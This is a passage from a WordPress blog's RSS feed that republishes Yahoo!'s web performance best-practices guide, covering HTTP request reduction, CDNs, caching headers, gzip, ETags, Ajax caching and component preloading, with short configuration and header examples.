<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/samashok.wordpress.com/93/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/samashok.wordpress.com/93/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samashok.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samashok.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samashok.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samashok.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samashok.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samashok.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samashok.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samashok.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samashok.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samashok.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samashok.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samashok.wordpress.com/93/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samashok.wordpress.com/93/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samashok.wordpress.com/93/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=93&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samashok.wordpress.com/2008/08/13/recursive-functions-in-asp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/201f1a85288bd1be71ee2a145c5e2a00?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samashok</media:title>
		</media:content>
	</item>
		<item>
		<title>Best Practices for Speeding Up Your Web Site</title>
		<link>http://samashok.wordpress.com/2008/07/09/best-practices-for-speeding-up-your-web-site/</link>
		<comments>http://samashok.wordpress.com/2008/07/09/best-practices-for-speeding-up-your-web-site/#comments</comments>
		<pubDate>Wed, 09 Jul 2008 13:50:00 +0000</pubDate>
		<dc:creator>Ashok Kumar S</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://samashok.wordpress.com/2008/07/09/best-practices-for-speeding-up-your-web-site/</guid>
		<description><![CDATA[The Exceptional Performance team has identified a number of best practices for making web pages fast. Minimize HTTP Requests 80% of the end-user response time is spent on the front-end. Most of this time is tied up in downloading all the components in the page: images, stylesheets, scripts, Flash, etc. Reducing the number of components [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samashok.wordpress.com&amp;blog=8895095&amp;post=92&amp;subd=samashok&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>  The Exceptional Performance team has identified a number of best practices for making web pages fast. </p>
<h3 id="num_http">Minimize HTTP Requests</h3>
<p>80% of the end-user response time is spent on the front-end. Most of  this time is tied up in downloading all the components in the page:  images, stylesheets, scripts, Flash, etc. Reducing the number of  components in turn reduces the number of HTTP requests required to  render the page. This is the key to faster pages. </p>
<p>One way to reduce the number of components in the page is to  simplify the page&#8217;s design. But is there a way to build pages with  richer content while also achieving fast response times? Here are some  techniques for reducing the number of HTTP requests, while still  supporting rich page designs.</p>
<p><strong>Combined files</strong> are a way to reduce the number of  HTTP requests by combining all scripts into a single script, and  similarly combining all CSS into a single stylesheet. Combining files  is more challenging when the scripts and stylesheets vary from page to  page, but making this part of your release process improves response  times.</p>
<p><a target="_blank" href="http://alistapart.com/articles/sprites"><strong>CSS Sprites</strong></a> are the preferred method for reducing the number of image requests.  Combine your background images into a single image and use the CSS background-image and background-position properties to display the desired image segment.</p>
<p><a target="_blank" href="http://www.w3.org/TR/html401/struct/objects.html#h-13.6"><strong>Image maps</strong></a> combine multiple images into a single image. The overall size is about  the same, but reducing the number of HTTP requests speeds up the page.  Image maps only work if the images are contiguous in the page, such as  a navigation bar. Defining the coordinates of image maps can be tedious  and error prone. Using image maps for navigation is not accessible too,  so it&#8217;s not recommended.</p>
<p><strong>Inline images</strong> use the <a target="_blank" href="http://tools.ietf.org/html/rfc2397">data: URL scheme</a> to embed the image data in the actual page. This can increase the size  of your HTML document. Combining inline images into your (cached)  stylesheets is a way to reduce HTTP requests and avoid increasing the  size of your pages. Inline images are not yet supported across all  major browsers.</p>
<p>Reducing the number of HTTP requests in your page is the place to  start. This is the most important guideline for improving performance  for first time visitors. As described in Tenni Theurer&#8217;s blog post <a target="_blank" href="http://yuiblog.com/blog/2007/01/04/performance-research-part-2/">Browser Cache Usage &#8211; Exposed!</a>,  40-60% of daily visitors to your site come in with an empty cache.  Making your page fast for these first time visitors is key to a better  user experience.</p>
<h3 id="cdn">Use a Content Delivery Network</h3>
<p>The user&#8217;s proximity to your web server has an impact on response  times. Deploying your content across multiple, geographically dispersed  servers will make your pages load faster from the user&#8217;s perspective.  But where should you start?</p>
<p>As a first step to implementing geographically dispersed content,  don&#8217;t attempt to redesign your web application to work in a distributed  architecture. Depending on the application, changing the architecture  could include daunting tasks such as synchronizing session state and  replicating database transactions across server locations. Attempts to  reduce the distance between users and your content could be delayed by,  or never pass, this application architecture step. </p>
<p>Remember that 80-90% of the end-user response time is spent  downloading all the components in the page: images, stylesheets,  scripts, Flash, etc. This is the <em>Performance Golden Rule</em>.  Rather than starting with the difficult task of redesigning your  application architecture, it&#8217;s better to first disperse your static  content. This not only achieves a bigger reduction in response times,  but it&#8217;s easier thanks to content delivery networks.</p>
<p>A content delivery network (CDN) is a collection of web servers  distributed across multiple locations to deliver content more  efficiently to users. The server selected for delivering content to a  specific user is typically based on a measure of network proximity. For  example, the server with the fewest network hops or the server with the  quickest response time is chosen.</p>
<p>Some large Internet companies own their own CDN, but it&#8217;s cost-effective to use a CDN service provider, such as <a target="_blank" href="http://www.akamai.com/">Akamai Technologies</a>, <a target="_blank" href="http://www.mirror-image.com/">Mirror Image Internet</a>, or <a target="_blank" href="http://www.limelightnetworks.com/">Limelight Networks</a>.  For start-up companies and private web sites, the cost of a CDN service  can be prohibitive, but as your target audience grows larger and  becomes more global, a CDN is necessary to achieve fast response times.  At Yahoo!, properties that moved static content off their application  web servers to a CDN improved end-user response times by 20% or more.  Switching to a CDN is a relatively easy code change that will  dramatically improve the speed of your web site.</p>
<h3 id="expires">Add an Expires or a Cache-Control Header</h3>
<p>There are two things in this rule:</p>
<ul>
<li>For static components: implement &quot;Never expire&quot; policy by setting far future Expires header</li>
<li>For dynamic components: use an appropriate Cache-Control header to help the browser with conditional requests</li>
</ul>
<p>Web page designs are getting richer and richer, which means more  scripts, stylesheets, images, and Flash in the page. A first-time  visitor to your page may have to make several HTTP requests, but by  using the Expires header you make those components cacheable. This  avoids unnecessary HTTP requests on subsequent page views. Expires  headers are most often used with images, but they should be used on <em>all</em> components including scripts, stylesheets, and Flash components.</p>
<p>Browsers (and proxies) use a cache to reduce the number and size of  HTTP requests, making web pages load faster. A web server uses the  Expires header in the HTTP response to tell the client how long a  component can be cached. This is a far future Expires header, telling  the browser that this response won&#8217;t be stale until April 15, 2010. </p>
<pre>      Expires: Thu, 15 Apr 2010 20:00:00 GMT</pre>
<p>If your server is Apache, use the ExiresDefault directive to set an  expiration date relative to the current date. This example of the  ExpiresDefault directive sets the Expires date 10 years out from the  time of the request.</p>
<pre>      ExpiresDefault &quot;access plus 10 years&quot;</pre>
<p>Keep in mind, if you use a far future Expires header you have to  change the component&#8217;s filename whenever the component changes. At  Yahoo! we often make this step part of the build process: a version  number is embedded in the component&#8217;s filename, for example,  yahoo_2.0.6.js.</p>
<p>Using a far future Expires header affects page views only after a  user has already visited your site. It has no effect on the number of  HTTP requests when a user visits your site for the first time and the  browser&#8217;s cache is empty. Therefore the impact of this performance  improvement depends on how often users hit your pages with a primed  cache. (A &quot;primed cache&quot; already contains all of the components in the  page.) We <a target="_blank" href="http://yuiblog.com/blog/2007/01/04/performance-research-part-2/">measured this at Yahoo!</a> and found the number of page views with a primed cache is 75-85%. By  using a far future Expires header, you increase the number of  components that are cached by the browser and re-used on subsequent  page views without sending a single byte over the user&#8217;s Internet  connection.</p>
<h3 id="gzip">Gzip Components</h3>
<p>The time it takes to transfer an HTTP request and response across  the network can be significantly reduced by decisions made by front-end  engineers. It&#8217;s true that the end-user&#8217;s bandwidth speed, Internet  service provider, proximity to peering exchange points, etc. are beyond  the control of the development team. But there are other variables that  affect response times. Compression reduces response times by reducing  the size of the HTTP response.</p>
<p>Starting with HTTP/1.1, web clients indicate support for compression with the Accept-Encoding header in the HTTP request.</p>
<pre>      Accept-Encoding: gzip, deflate</pre>
<p>If the web server sees this header in the request, it may compress  the response using one of the methods listed by the client. The web  server notifies the web client of this via the Content-Encoding header  in the response.</p>
<pre>      Content-Encoding: gzip</pre>
<p>Gzip is the most popular and effective compression method at this time. It was developed by the GNU project and standardized by <a target="_blank" href="http://www.ietf.org/rfc/rfc1952.txt">RFC 1952</a>. The only other compression format you&#8217;re likely to see is deflate, but it&#8217;s less effective and less popular. </p>
<p>Gzipping generally reduces the response size by about 70%.  Approximately 90% of today&#8217;s Internet traffic travels through browsers  that claim to support gzip. If you use Apache, the module configuring  gzip depends on your version: Apache 1.3 uses <a target="_blank" href="http://sourceforge.net/projects/mod-gzip/">mod_gzip</a> while Apache 2.x uses <a target="_blank" href="http://httpd.apache.org/docs/2.0/mod/mod_deflate.html">mod_deflate</a>. </p>
<p>There are known issues with browsers and proxies that may cause a  mismatch in what the browser expects and what it receives with regard  to compressed content. Fortunately, these edge cases are dwindling as  the use of older browsers drops off. The Apache modules help out by  adding appropriate Vary response headers automatically. </p>
<p>Servers choose what to gzip based on file type, but are typically  too limited in what they decide to compress. Most web sites gzip their  HTML documents. It&#8217;s also worthwhile to gzip your scripts and  stylesheets, but many web sites miss this opportunity. In fact, it&#8217;s  worthwhile to compress any text response including XML and JSON. Image  and PDF files should not be gzipped because they are already  compressed. Trying to gzip them not only wastes CPU but can potentially  increase file sizes. </p>
<p>Gzipping as many file types as possible is an easy way to reduce page weight and accelerate the user experience.</p>
<h3 id="css_top">Put Stylesheets at the Top</h3>
<p>While researching performance at Yahoo!, we discovered that moving stylesheets to the document HEAD makes pages <em>apprear</em> to be loading faster. This is because putting stylesheets in the HEAD allows the page to render progressively. </p>
<p>Front-end engineers that care about performance want a page to load  progressively; that is, we want the browser to display whatever content  it has as soon as possible. This is especially important for pages with  a lot of content and for users on slower Internet connections. The  importance of giving users visual feedback, such as progress  indicators, has been well researched and <a target="_blank" href="http://www.useit.com/papers/responsetime.html">documented</a>.  In our case the HTML page is the progress indicator! When the browser  loads the page progressively the header, the navigation bar, the logo  at the top, etc. all serve as visual feedback for the user who is  waiting for the page. This improves the overall user experience.</p>
<p>The problem with putting stylesheets near the bottom of the document  is that it prohibits progressive rendering in many browsers, including  Internet Explorer. These browsers block rendering to avoid having to  redraw elements of the page if their styles change. The user is stuck  viewing a blank white page. </p>
<p>The <a target="_blank" href="http://www.w3.org/TR/html4/struct/links.html#h-12.3">HTML specification</a> clearly states that stylesheets are to be included in the HEAD of the  page: &quot;Unlike A, [LINK] may only appear in the HEAD section of a  document, although it may appear any number of times.&quot; Neither of the  alternatives, the blank white screen or flash of unstyled content, are  worth the risk. The optimal solution is to follow the HTML  specification and load your stylesheets in the document HEAD.</p>
<h3 id="js_bottom">Put Scripts at the Bottom</h3>
<p>The problem caused by scripts is that they block parallel downloads. The <a target="_blank" href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html#sec8.1.4">HTTP/1.1 specification</a> suggests that browsers download no more than two components in parallel  per hostname. If you serve your images from multiple hostnames, you can  get more than two downloads to occur in parallel. While a script is  downloading, however, the browser won&#8217;t start any other downloads, even  on different hostnames. </p>
<p>In some situations it&#8217;s not easy to move scripts to the bottom. If, for example, the script uses document.write  to insert part of the page&#8217;s content, it can&#8217;t be moved lower in the  page. There might also be scoping issues. In many cases, there are ways  to workaround these situations.</p>
<p>An alternative suggestion that often comes up is to use deferred scripts. The DEFER  attribute indicates that the script does not contain document.write,  and is a clue to browsers that they can continue rendering.  Unfortunately, Firefox doesn&#8217;t support the DEFER  attribute. In Internet Explorer, the script may be deferred, but not as  much as desired. If a script can be deferred, it can also be moved to  the bottom of the page. That will make your web pages load faster.</p>
<h3 id="css_expressions">Avoid CSS Expressions</h3>
<p>CSS expressions are a powerful (and dangerous) way to set CSS  properties dynamically. They&#8217;re supported in Internet Explorer,  starting with <a target="_blank" href="http://msdn.microsoft.com/workshop/author/dhtml/overview/recalc.asp">version 5</a>. As an example, the background color could be set to alternate every hour using CSS expressions.</p>
<pre>      background-color: expression( (new Date()).getHours()%2 ? &quot;#B8D4FF&quot; : &quot;#F08A00&quot; );</pre>
<p>As shown here, the expression method accepts a JavaScript expression. The CSS property is set to the result of evaluating the JavaScript expression. The expression  method is ignored by other browsers, so it is useful for setting  properties in Internet Explorer needed to create a consistent  experience across browsers.</p>
<p>The problem with expressions is that they are evaluated more  frequently than most people expect. Not only are they evaluated when  the page is rendered and resized, but also when the page is scrolled  and even when the user moves the mouse over the page. Adding a counter  to the CSS expression allows us to keep track of when and how often a  CSS expression is evaluated. Moving the mouse around the page can  easily generate more than 10,000 evaluations.</p>
<p>One way to reduce the number of times your CSS expression is  evaluated is to use one-time expressions, where the first time the  expression is evaluated it sets the style property to an explicit  value, which replaces the CSS expression. If the style property must be  set dynamically throughout the life of the page, using event handlers  instead of CSS expressions is an alternative approach. If you must use  CSS expressions, remember that they may be evaluated thousands of times  and could affect the performance of your page.</p>
<h3 id="external">Make JavaScript and CSS External</h3>
<p>Many of these performance rules deal with how external components  are managed. However, before these considerations arise you should ask  a more basic question: Should JavaScript and CSS be contained in  external files, or inlined in the page itself?</p>
<p>Using external files in the real world generally produces faster  pages because the JavaScript and CSS files are cached by the browser.  JavaScript and CSS that are inlined in HTML documents get downloaded  every time the HTML document is requested. This reduces the number of  HTTP requests that are needed, but increases the size of the HTML  document. On the other hand, if the JavaScript and CSS are in external  files cached by the browser, the size of the HTML document is reduced  without increasing the number of HTTP requests. </p>
<p>The key factor, then, is the frequency with which external  JavaScript and CSS components are cached relative to the number of HTML  documents requested. This factor, although difficult to quantify, can  be gauged using various metrics. If users on your site have multiple  page views per session and many of your pages re-use the same scripts  and stylesheets, there is a greater potential benefit from cached  external files. </p>
<p>Many web sites fall in the middle of these metrics. For these sites,  the best solution generally is to deploy the JavaScript and CSS as  external files. The only exception where inlining is preferable is with  home pages, such as <a target="_blank" href="http://www.yahoo.com">Yahoo!&#8217;s front page</a> and <a target="_blank" href="http://my.yahoo.com">My Yahoo!</a>.  Home  pages that have few (perhaps only one) page view per session may find  that inlining JavaScript and CSS results in faster end-user response  times.</p>
<p>For front pages that are typically the first of many page views,  there are techniques that leverage the reduction of HTTP requests that  inlining provides, as well as the caching benefits achieved through  using external files. One such technique is to inline JavaScript and  CSS in the front page, but dynamically download the external files  after the page has finished loading. Subsequent pages would reference  the external files that should already be in the browser&#8217;s cache.</p>
<h3 id="dns_lookups">Reduce DNS Lookups</h3>
<p>The Domain Name System (DNS) maps hostnames to IP addresses, just as  phonebooks map people&#8217;s names to their phone numbers. When you type  www.yahoo.com into your browser, a DNS resolver contacted by the  browser returns that server&#8217;s IP address. DNS has a cost. It typically  takes 20-120 milliseconds for DNS to lookup the IP address for a given  hostname. The browser can&#8217;t download anything from this hostname until  the DNS lookup is completed. </p>
<p>DNS lookups are cached for better performance. This caching can  occur on a special caching server, maintained by the user&#8217;s ISP or  local area network, but there is also caching that occurs on the  individual user&#8217;s computer. The DNS information remains in the  operating system&#8217;s DNS cache (the &quot;DNS Client service&quot; on Microsoft  Windows). Most browsers have their own caches, separate from the  operating system&#8217;s cache. As long as the browser keeps a DNS record in  its own cache, it doesn&#8217;t bother the operating system with a request  for the record.</p>
<p>Internet Explorer caches DNS lookups for 30 minutes by default, as specified by the  DnsCacheTimeout registry setting. Firefox caches DNS lookups for 1 minute, controlled by the network.dnsCacheExpiration configuration setting. (Fasterfox changes this to 1 hour.)</p>
<p>When the client&#8217;s DNS cache is empty (for both the browser and the  operating system), the number of DNS lookups is equal to the number of  unique hostnames in the web page. This includes the hostnames used in  the page&#8217;s URL, images, script files, stylesheets, Flash objects, etc.  Reducing the number of unique hostnames reduces the number of DNS  lookups. </p>
<p>Reducing the number of unique hostnames has the potential to reduce  the amount of parallel downloading that takes place in the page.  Avoiding DNS lookups cuts response times, but reducing parallel  downloads may increase response times. My guideline is to split these  components across at least two but no more than four hostnames. This  results in a good compromise between reducing DNS lookups and allowing  a high degree of parallel downloads.</p>
<h3 id="minify">Minify JavaScript and CSS</h3>
<p>Minification is the practice of removing unnecessary characters from  code to reduce its size thereby improving load times. When code is  minified all comments are removed, as well as unneeded white space  characters (space, newline, and tab). In the case of JavaScript, this  improves response time performance because the size of the downloaded  file is reduced. Two popular tools for minifying JavaScript code are <a target="_blank" href="http://crockford.com/javascript/jsmin">JSMin</a> and <a target="_blank" href="http://developer.yahoo.com/yui/compressor/">YUI Compressor</a>. The YUI compressor can also minify CSS.</p>
<p>Obfuscation is an alternative optimization that can be applied to  source code. It&#8217;s more complex than minification and thus more likely  to generate bugs as a result of the obfuscation step itself. In a  survey of ten top U.S. web sites, minification achieved a 21% size  reduction versus 25% for obfuscation. Although obfuscation has a higher  size reduction, minifying JavaScript is less risky.</p>
<p>In addition to minifying external scripts and styles, inlined &lt;script&gt; and &lt;style&gt;  blocks can and should also be minified. Even if you gzip your scripts  and styles, minifying them will still reduce the size by 5% or more. As  the use and size of JavaScript and CSS increases, so will the savings  gained by minifying your code.</p>
<h3 id="redirects">Avoid Redirects</h3>
<p>Redirects are accomplished using the 301 and 302 status codes. Here&#8217;s an example of the HTTP headers in a 301 response:</p>
<pre>      HTTP/1.1 301 Moved Permanently        Location: http://example.com/newuri        Content-Type: text/html</pre>
<p>The browser automatically takes the user to the URL specified in the Location  field. All the information necessary for a redirect is in the headers.  The body of the response is typically empty. Despite their names,  neither a 301 nor a 302 response is cached in practice unless  additional headers, such as Expires or Cache-Control,  indicate it should be. The meta refresh tag and JavaScript are other  ways to direct users to a different URL, but if you must do a redirect,  the preferred technique is to use the standard 3xx HTTP status codes,  primarily to ensure the back button works correctly.</p>
<p>The main thing to remember is that redirects slow down the user  experience. Inserting a redirect between the user and the HTML document  delays everything in the page since nothing in the page can be rendered  and no components can start being downloaded until the HTML document  has arrived.</p>
<p>One of the most wasteful redirects happens frequently and web  developers are generally not aware of it. It occurs when a trailing  slash (/) is missing from a URL that should otherwise have one. For  example, going to <a target="_blank" href="http://astrology.yahoo.com/astrology">http://astrology.yahoo.com/astrology</a> results in a 301 response containing a redirect to <a target="_blank" href="http://astrology.yahoo.com/astrology/">http://astrology.yahoo.com/astrology/</a> (notice the added trailing slash). This is fixed in Apache by using Alias or mod_rewrite, or the DirectorySlash directive if you&#8217;re using Apache handlers.</p>
<p>Connecting an old web site to a new one is another common use for  redirects. Others include connecting different parts of a website and  directing the user based on certain conditions (type of browser, type  of user account, etc.). Using a redirect to connect two web sites is  simple and requires little additional coding. Although using redirects  in these situations reduces the complexity for developers, it degrades  the user experience. Alternatives for this use of redirects include  using Alias and mod_rewrite if the two code  paths are hosted on the same server. If a domain name change is the  cause of using redirects, an alternative is to create a CNAME (a DNS  record that creates an alias pointing from one domain name to another)  in combination with Alias or mod_rewrite.</p>
<h3 id="js_dupes">Remove Duplicate Scripts</h3>
<p>It hurts performance to include the same JavaScript file twice in  one page. This isn&#8217;t as unusual as you might think. A review of the ten  top U.S. web sites shows that two of them contain a duplicated script.  Two main factors increase the odds of a script being duplicated in a  single web page: team size and number of scripts. When it does happen,  duplicate scripts hurt performance by creating unnecessary HTTP  requests and wasted JavaScript execution.</p>
<p>Unnecessary HTTP requests happen in Internet Explorer, but not in  Firefox. In Internet Explorer, if an external script is included twice  and is not cacheable, it generates two HTTP requests during page  loading. Even if the script is cacheable, extra HTTP requests occur  when the user reloads the page.</p>
<p>In addition to generating wasteful HTTP requests, time is wasted  evaluating the script multiple times. This redundant JavaScript  execution happens in both Firefox and Internet Explorer, regardless of  whether the script is cacheable.</p>
<p>One way to avoid accidentally including the same script twice is to  implement a script management module in your templating system. The  typical way to include a script is to use the SCRIPT tag in your HTML  page.</p>
<pre>      &lt;script type=&quot;text/javascript&quot; src=&quot;menu_1.0.17.js&quot;&gt;&lt;/script&gt;</pre>
<p>An alternative in PHP would be to create a function called insertScript.</p>
<pre>      &lt;?php insertScript(&quot;menu.js&quot;) ?&gt;</pre>
<p>In addition to preventing the same script from being inserted  multiple times, this function could handle other issues with scripts,  such as dependency checking and adding version numbers to script  filenames to support far future Expires headers.</p>
<h3 id="etags">Configure ETags</h3>
<p>Entity tags (ETags) are a mechanism that web servers and browsers  use to determine whether the component in the browser&#8217;s cache matches  the one on the origin server. (An &quot;entity&quot; is another word a  &quot;component&quot;: images, scripts, stylesheets, etc.) ETags were added to  provide a mechanism for validating entities that is more flexible than  the last-modified date. An ETag is a string that uniquely identifies a  specific version of a component. The only format constraints are that  the string be quoted. The origin server specifies the component&#8217;s ETag  using the ETag response header.</p>
<pre>      HTTP/1.1 200 OK        Last-Modified: Tue, 12 Dec 2006 03:03:59 GMT        ETag: &quot;10c24bc-4ab-457e1c1f&quot;        Content-Length: 12195</pre>
<p>Later, if the browser has to validate a component, it uses the If-None-Match  header to pass the ETag back to the origin server. If the ETags match,  a 304 status code is returned reducing the response by 12195 bytes for  this example. </p>
<pre>      GET /i/yahoo.gif HTTP/1.1        Host: us.yimg.com        If-Modified-Since: Tue, 12 Dec 2006 03:03:59 GMT        If-None-Match: &quot;10c24bc-4ab-457e1c1f&quot;        HTTP/1.1 304 Not Modified</pre>
<p>The problem with ETags is that they typically are constructed using  attributes that make them unique to a specific server hosting a site.  ETags won&#8217;t match when a browser gets the original component from one  server and later tries to validate that component on a different  server, a situation that is all too common on Web sites that use a  cluster of servers to handle requests. By default, both Apache and IIS  embed data in the ETag that dramatically reduces the odds of the  validity test succeeding on web sites with multiple servers. </p>
<p>The ETag format for Apache 1.3 and 2.x is inode-size-timestamp.  Although a given file may reside in the same directory across multiple  servers, and have the same file size, permissions, timestamp, etc., its  inode is different from one server to the next. </p>
<p>IIS 5.0 and 6.0 have a similar issue with ETags. The format for ETags on IIS is Filetimestamp:ChangeNumber. A ChangeNumber is a counter used to track configuration changes to IIS. It&#8217;s unlikely that the ChangeNumber is the same across all IIS servers behind a web site. </p>
<p>The end result is ETags generated by Apache and IIS for the  exact same component won&#8217;t match from one server to another. If the  ETags don&#8217;t match, the user doesn&#8217;t receive the small, fast 304  response that ETags were designed for; instead, they&#8217;ll get a normal  200 response along with all the data for the component. If you host  your web site on just one server, this isn&#8217;t a problem. But if you have  multiple servers hosting your web site, and you&#8217;re using Apache or IIS  with the default ETag configuration, your users are getting slower  pages, your servers have a higher load, you&#8217;re consuming greater  bandwidth, and proxies aren&#8217;t caching your content efficiently. Even if  your components have a far future Expires header, a conditional GET request is still made whenever the user hits Reload or Refresh. </p>
<p>If you&#8217;re not taking advantage of the flexible validation model  that ETags provide, it&#8217;s better to just remove the ETag altogether. The  Last-Modified header validates based on the component&#8217;s  timestamp. And removing the ETag reduces the size of the HTTP headers  in both the response and subsequent requests. This <a target="_blank" href="http://support.microsoft.com/?id=922733">Microsoft Support article</a> describes how to remove ETags. In Apache, this is done by simply adding the following line to your Apache configuration file: </p>
<pre>      FileETag none</pre>
<h3 id="cacheajax">Make Ajax Cacheable</h3>
<p>One of the cited benefits of Ajax is that it provides instantaneous  feedback to the user because it requests information asynchronously  from the backend web server. However, using Ajax is no guarantee that  the user won&#8217;t be twiddling his thumbs waiting for those asynchronous  JavaScript and XML responses to return. In many applications, whether  or not the user is kept waiting depends on how Ajax is used. For  example, in a web-based email client the user will be kept waiting for  the results of an Ajax request to find all the email messages that  match their search criteria. It&#8217;s important to remember that  &quot;asynchronous&quot; does not imply &quot;instantaneous&quot;.</p>
<p>To improve performance, it&#8217;s important to optimize these Ajax  responses. The most important way to improve the performance of Ajax is  to make the responses cacheable, as discussed in <a target="_blank" href="http://developer.yahoo.com/performance/rules.html#expires">Add an Expires or a Cache-Control Header</a>. Some of the other rules also apply to Ajax:</p>
<ul> 
<li> <a target="_blank" href="http://developer.yahoo.com/performance/rules.html#gzip">Gzip Components</a>  </li>
<li> <a target="_blank" href="http://developer.yahoo.com/performance/rules.html#dns_lookups">Reduce DNS Lookups</a>  </li>
<li> <a target="_blank" href="http://developer.yahoo.com/performance/rules.html#minify">Minify JavaScript</a>  </li>
<li> <a target="_blank" href="http://developer.yahoo.com/performance/rules.html#redirects">Avoid Redirects</a>  </li>
<li> <a target="_blank" href="http://developer.yahoo.com/performance/rules.html#etags">Configure ETags</a>  </li>
</ul>
<p>Let&#8217;s look at an example. A Web 2.0 email client might use Ajax to  download the user&#8217;s address book for autocompletion. If the user hasn&#8217;t  modified her address book since the last time she used the email web  app, the previous address book response could be read from cache if  that Ajax response was made cacheable with a future Expires or  Cache-Control header. The browser must be informed when to use a  previously cached address book response versus requesting a new one.  This could be done by adding a timestamp to the address book Ajax URL  indicating the last time the user modified her address book, for  example, &amp;t=1190241612. If the address book hasn&#8217;t  been modified since the last download, the timestamp will be the same  and the address book will be read from the browser&#8217;s cache eliminating  an extra HTTP roundtrip. If the user has modified her address book, the  timestamp ensures the new URL doesn&#8217;t match the cached response, and  the browser will request the updated address book entries.</p>
<p>Even though your Ajax responses are created dynamically, and might  only be applicable to a single user, they can still be cached. Doing so  will make your Web 2.0 apps faster.</p>
<h3>Flush the Buffer Early</h3>
<p> When users request a page, it can take anywhere from 200 to 500ms for the backend server to stitch together the HTML page.   During this time, the browser is idle as it waits for the data to arrive.   In PHP you have the function <a target="_blank" href="http://php.net/flush">flush()</a>.   It allows you to send your partially ready HTML response to the browser so that   the browser can start fetching components while your backend is busy with the rest of the HTML page.   The benefit is mainly seen on busy backends or light frontends. </p>
<p> A good place to consider flushing is right after the HEAD because the HTML for the head is      usually easier to produce and it allows you to include any CSS and JavaScript      files for the browser to start fetching in parallel while the backend is still processing. </p>
<p>Example:</p>
<pre>      ... &lt;!-- css, js --&gt;      &lt;/head&gt;      &lt;?php flush(); ?&gt;      &lt;body&gt;        ... &lt;!-- content --&gt;  </pre>
<p><a target="_blank" href="http://search.yahoo.com">Yahoo! search</a> pioneered research and real user testing to prove the benefits of using this technique.</p>
<h3 id="ajax_get">Use GET for AJAX Requests</h3>
<p> The <a target="_blank" href="http://mail.yahoo.com">Yahoo! Mail</a> team found that when using XMLHttpRequest,  POST is implemented in the browsers as a two-step process: sending the  headers first, then sending data. So it&#8217;s best to use GET, which only  takes one TCP packet to send (unless you have a lot of cookies). The  maximum URL length in IE is 2K, so if you send more than 2K data you  might not be able to use GET. </p>
<p>An interesting side affect is that POST without actually posting any data behaves like GET.  Based on the <a target="_blank" href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html">HTTP specs</a>,  GET is meant for retrieving information, so it makes sense  (semantically) to use GET when you&#8217;re only requesting data, as opposed  to sending data to be stored server-side. </p>
<h3 id="postload">Post-load Components</h3>
<p> You can take a closer look at your page and ask yourself: &quot;What&#8217;s  absolutely required in order to render the page initially?&quot;. The rest  of the content and components can wait. </p>
<p> JavaScript is an ideal candidate for splitting before and after the  onload event. For example if you have JavaScript code and libraries  that do drag and drop and animations, those can wait, because dragging  elements on the page comes after the initial rendering. Other places to  look for candidates for post-loading include hidden content (content  that appears after a user action) and images below the fold. </p>
<p> Tools to help you out in your effort: <a target="_blank" href="http://developer.yahoo.com/yui/imageloader/">YUI Image Loader</a> allows you to delay images      below the fold and the <a target="_blank" href="http://developer.yahoo.com/yui/get/">YUI Get utility</a> is an easy way to include JS and CSS on the fly.      For an example in the wild take a look at <a target="_blank" href="http://www.yahoo.com">Yahoo! Home Page</a> with Firebug&#8217;s Net Panel turned on. </p>
<p> It&#8217;s good when the performance goals are inline with other web  development best practices. In this case, the idea of progressive  enhancement tells us that JavaScript, when supported, can improve the  user experience but you have to make sure the page works even without  JavaScript. So after you&#8217;ve made sure the page works fine, you can  enhance it with some post-loaded scripts that give you more bells and  whistles such as drag and drop and animations. </p>
<h3 id="preload">Preload Components</h3>
<p> Preload may look like the opposite of post-load, but it actually has a different goal.      By preloading components you can take advantage of the time the browser is idle and request components      (like images, styles and scripts) you&#8217;ll need in the future.      This way when the user visits the next page, you could have most of the components already in      the cache and your page will load much faster for the user. </p>
<p> There are actually several types of preloading: </p>
<ul>
<li><em>Unconditional</em> preload &#8211; as soon as onload fires, you go ahead and fetch some extra components.          Check google.com for an example of how a sprite image is requested onload. This sprite image is          not needed on the google.com homepage, but it is needed on the consecutive search result page.</li>
<li><em>Conditional</em> preload &#8211; based on a user action you make an educated guess where the user is headed next and preload accordingly.          On <a target="_blank" href="http://search.yahoo.com">search.yahoo.com</a> you can see how some extra components are requested          after you start typing in the input box.</li>
<li><em>Anticipated</em> preload &#8211; preload in advance before launching a redesign. It often  happens after a redesign that you hear: &quot;The new site is cool, but it&#8217;s  slower than before&quot;. Part of the problem could be that the users were  visiting your old site with a full cache, but the new one is always an  empty cache experience. You can mitigate this side effect by preloading  some components before you even launched the redesign. Your old site  can use the time the browser is idle and request images and scripts  that will be used by the new site</li>
</ul>
<h3 id="min_dom">Reduce the Number of DOM Elements</h3>
